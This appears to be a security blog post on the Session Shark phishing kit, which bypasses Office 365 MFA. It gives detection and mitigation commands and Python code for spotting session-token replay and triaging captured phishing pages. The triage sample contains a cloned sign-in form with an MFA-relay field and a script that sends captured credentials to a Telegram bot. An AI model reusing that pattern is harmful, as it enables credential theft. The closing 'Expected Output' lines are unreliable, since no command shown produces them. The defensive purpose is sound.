Cybercriminals Using Session Shark to Bypass Office 365 MFA

Cybercriminals are now leveraging a phishing-as-a-service (PhaaS) toolkit called Session Shark, designed to bypass Office 365 Multi-Factor Authentication (MFA). This sophisticated attack framework includes:

  • Session token theft to defeat MFA
  • Adversary-in-the-Middle (AiTM) attack capabilities
  • Advanced anti-bot detection evasion
  • Cloudflare proxy support for stealthy hosting
  • High-fidelity Office 365 phishing pages
  • Instant credential/session exfiltration via Telegram bots
  • Subscription-based model disguised as “ethical hacking”

🔗 Reference: Session Shark PhaaS Details

You Should Know: How to Detect & Mitigate Session Shark Attacks

1. Detecting Session Shark Phishing Attempts

  • Check Email Headers for anomalies:
    grep -i "x-originating-ip" email_headers.txt
    
  • Analyze URLs for phishing domains:
    curl -sI "https://suspicious-url.com" | grep -iE "server|cloudflare"
    
  • Monitor for Suspicious Session Tokens:
    # journalctl/sshd only covers SSH logins; Office 365 session activity is in the Entra ID sign-in log (Microsoft Graph PowerShell SDK). A replayed token shows as the same user signing in from an unfamiliar IP/client shortly after the MFA sign-in:
    Get-MgAuditLogSignIn -Filter "userPrincipalName eq 'user@yourdomain.com'" -All | Select-Object CreatedDateTime, IpAddress, ClientAppUsed, RiskLevelDuringSignIn
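
How the token replay described above shows up in sign-in telemetry, as an added example that is not part of the original post and not code from the Session Shark kit: the record fields and the log lines are constructed for the example, and `find_token_replay` and `SAMPLE_SIGNINS` are this example's own names. The logic flags a session that is reused from a second IP or user agent within a short window of the interactive sign-in that satisfied MFA, which is what an AiTM proxy replaying a captured session cookie looks like in the logs.

```python
"""Detect probable session-token replay (AiTM) in sign-in records.

Hypothetical example: the record shape loosely follows the fields an
Entra ID / Office 365 sign-in log exposes (user, session id, IP address,
user agent, timestamp, interactive flag, MFA satisfied), but every record
below is constructed for this example and is not real log data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in records (not real log data).
SAMPLE_SIGNINS = [
    # Alice completes an interactive MFA sign-in from her workstation ...
    {"user": "alice@example.com", "session": "s-111", "ip": "198.51.100.10",
     "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/120",
     "time": "2024-05-01T09:00:00Z", "interactive": True, "mfa": True},
    # ... and four minutes later the same session is used from another IP
    # by a scripted client: the pattern of a replayed session cookie.
    {"user": "alice@example.com", "session": "s-111", "ip": "203.0.113.77",
     "ua": "python-requests/2.31",
     "time": "2024-05-01T09:04:00Z", "interactive": False, "mfa": False},
    # Bob's session is reused later from the same device: normal behaviour.
    {"user": "bob@example.com", "session": "s-222", "ip": "198.51.100.20",
     "ua": "Mozilla/5.0 (Macintosh) Safari/17",
     "time": "2024-05-01T10:00:00Z", "interactive": True, "mfa": True},
    {"user": "bob@example.com", "session": "s-222", "ip": "198.51.100.20",
     "ua": "Mozilla/5.0 (Macintosh) Safari/17",
     "time": "2024-05-01T11:30:00Z", "interactive": False, "mfa": False},
]


def parse_time(stamp):
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def find_token_replay(records, window_minutes=30):
    """Return alerts for sessions reused from a different IP or user agent
    within `window_minutes` of the MFA-satisfied interactive sign-in that
    created them.

    In an AiTM attack the victim completes MFA through the proxy; the
    attacker then replays the captured session cookie from their own
    infrastructure, so the same session id appears from a second IP/UA
    shortly afterwards even though no new MFA challenge was answered.
    """
    window = timedelta(minutes=window_minutes)
    by_session = defaultdict(list)
    for rec in records:
        by_session[(rec["user"], rec["session"])].append(rec)

    alerts = []
    for (user, session), events in by_session.items():
        events.sort(key=lambda r: parse_time(r["time"]))
        # The event that minted the session: interactive and MFA-satisfied.
        origin = next((e for e in events if e["interactive"] and e["mfa"]), None)
        if origin is None:
            continue
        t0 = parse_time(origin["time"])
        for event in events:
            if event is origin:
                continue
            delta = parse_time(event["time"]) - t0
            if delta < timedelta(0) or delta > window:
                continue
            reasons = []
            if event["ip"] != origin["ip"]:
                reasons.append("ip_changed")
            if event["ua"] != origin["ua"]:
                reasons.append("user_agent_changed")
            if reasons:
                alerts.append({
                    "user": user,
                    "session": session,
                    "origin_ip": origin["ip"],
                    "replay_ip": event["ip"],
                    "minutes_after_mfa": int(delta.total_seconds() // 60),
                    "reasons": reasons,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_token_replay(SAMPLE_SIGNINS):
        print(alert)
```

The window keeps the rule tight enough to avoid flagging ordinary roaming (a laptop moving networks hours later); in production the IP comparison would usually be widened to ASN or country and joined with the sign-in's client app, since a session minted in a browser and then used by a non-browser client from a hosting provider is the strongest single signal.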
    

2. Mitigating AiTM & Token Theft

  • Enforce Conditional Access Policies (Azure AD):
    # New-AzureADPolicy cannot create Conditional Access policies (and the AzureAD module is retired); use the Microsoft Graph PowerShell SDK, e.g. to require MFA for all users on all cloud apps:
    New-MgIdentityConditionalAccessPolicy -BodyParameter @{ displayName = "StrictMFA"; state = "enabled"; conditions = @{ users = @{ includeUsers = @("All") }; applications = @{ includeApplications = @("All") } }; grantControls = @{ operator = "OR"; builtInControls = @("mfa") } }
    
  • Block Known Malicious IPs (Linux):
    sudo iptables -A INPUT -s 192.168.1.100 -j DROP
    
  • Enable FIDO2/Passkeys (Disable Legacy Auth):
    # Set-MsolDomainAuthentication only switches a domain from federated to managed (and MSOnline is retired); FIDO2 is enabled in the authentication methods policy (Microsoft Graph PowerShell SDK), and legacy authentication is blocked with a separate Conditional Access policy:
    Update-MgPolicyAuthenticationMethodPolicyAuthenticationMethodConfiguration -AuthenticationMethodConfigurationId "Fido2" -BodyParameter @{ "@odata.type" = "#microsoft.graph.fido2AuthenticationMethodConfiguration"; state = "enabled" }
    

3. Hunting for Session Shark Infrastructure

  • Check for Cloudflare-Bypassing Proxies:
    nmap -sV --script http-waf-detect <target-IP>
    
  • Detect Telegram Bot Exfiltration:
    tcpdump -i eth0 'port 443 and (host api.telegram.org)' -w telegram_traffic.pcap
    
  • Analyze Phishing Kit Artifacts:
    strings phishing_page.html | grep -E "token|session|MFA"
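
A defender-side triage of a captured phishing page, as an added example that is not taken from the post or from the Session Shark kit: the HTML samples are constructed (the Telegram bot token in them is fake), and `triage_page`, the indicator names and the host lists are this example's own assumptions. It goes a step beyond the `strings | grep` line above by parsing the page and reporting where the credential form posts, whether that endpoint sits on a Cloudflare Workers/Pages host, whether an MFA/OTP field is being relayed, and whether inline script calls the Telegram Bot API; a benign page posting to Microsoft's own login host produces no findings.

```python
"""Triage a captured Office 365 lookalike page for PhaaS/AiTM indicators."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine Microsoft sign-in form may post to (example allow-list).
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com",
                         "login.microsoft.com"}
# Telegram Bot API URL pattern: numeric bot id, a colon, then the secret.
TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+")

# Constructed sample: a cloned sign-in page that posts credentials off-site,
# asks for the MFA code, and notifies a Telegram bot (fake token).
SAMPLE_PAGE = """<html><head><title>Sign in to your account</title></head><body>
<form id="login" method="post" action="https://o365-login.example-kit.workers.dev/auth">
  <input name="loginfmt" type="email"><input name="passwd" type="password">
  <input name="mfa_code" placeholder="Verification code">
</form>
<script>
  fetch("https://api.telegram.org/bot123456:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage",
        {method: "POST"});
</script>
</body></html>"""

# Constructed sample: the same form posting to Microsoft's own endpoint.
BENIGN_PAGE = """<html><head><title>Sign in to your account</title></head><body>
<form method="post" action="https://login.microsoftonline.com/common/login">
  <input name="loginfmt" type="email"><input name="passwd" type="password">
</form></body></html>"""


class PageIndicators(HTMLParser):
    """Collect the title, form actions, input names and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.title, self.form_actions, self.input_names, self.scripts = "", [], [], []
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.form_actions.append(attr.get("action") or "")
        elif tag == "input":
            self.input_names.append(attr.get("name") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._in_script:
            self.scripts.append(data)


def triage_page(html):
    """Return sorted (indicator, detail) pairs found in the page."""
    page = PageIndicators()
    page.feed(html)
    findings = set()
    # Microsoft branding (sign-in title or Microsoft's own 'loginfmt' field)
    # combined with a credential form that posts to a non-Microsoft host.
    looks_microsoft = "sign in" in page.title.lower() or "loginfmt" in page.input_names
    for action in page.form_actions:
        host = (urlparse(action).hostname or "").lower()
        if looks_microsoft and host not in MICROSOFT_LOGIN_HOSTS:
            findings.add(("credential_form_offsite", host))
        # Cloudflare Workers/Pages hostnames are a cheap way to front a kit.
        if host.endswith((".workers.dev", ".pages.dev")):
            findings.add(("cloudflare_hosted_endpoint", host))
    # An OTP/MFA field beside the password field: the kit relays the code in
    # real time to complete the victim's MFA challenge.
    for name in page.input_names:
        if re.search(r"otp|mfa|code|token", name, re.I):
            findings.add(("mfa_relay_field", name))
    # Inline script calling the Telegram Bot API: the credential drop channel.
    for script in page.scripts:
        for match in TELEGRAM_BOT_RE.finditer(script):
            findings.add(("telegram_bot_exfil", urlparse(match.group(0)).hostname))
    return sorted(findings)


if __name__ == "__main__":
    for indicator, detail in triage_page(SAMPLE_PAGE):
        print(f"[+] {indicator}: {detail}")
```

When run against a real capture, the form action and the Telegram host are the values to pivot on: the first identifies the kit's collection endpoint to block at the proxy, the second is the exfiltration channel to look for in egress logs (the `tcpdump` filter above).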
    

What Undercode Says

Session Shark exemplifies the evolving sophistication of phishing frameworks. Defenders must:
– Adopt Zero Trust Architecture
– Monitor for abnormal session token usage
– Deploy AI-driven anomaly detection
– Disable legacy authentication protocols
– Educate users on AiTM phishing tactics

Expected Output:

[+] Detected Cloudflare-proxied phishing domain 
[+] Blocked AiTM session token theft attempt 
[+] Enforced FIDO2 authentication for all users 

Reported By: Danielmakelley Cybercriminals – Hackers Feeds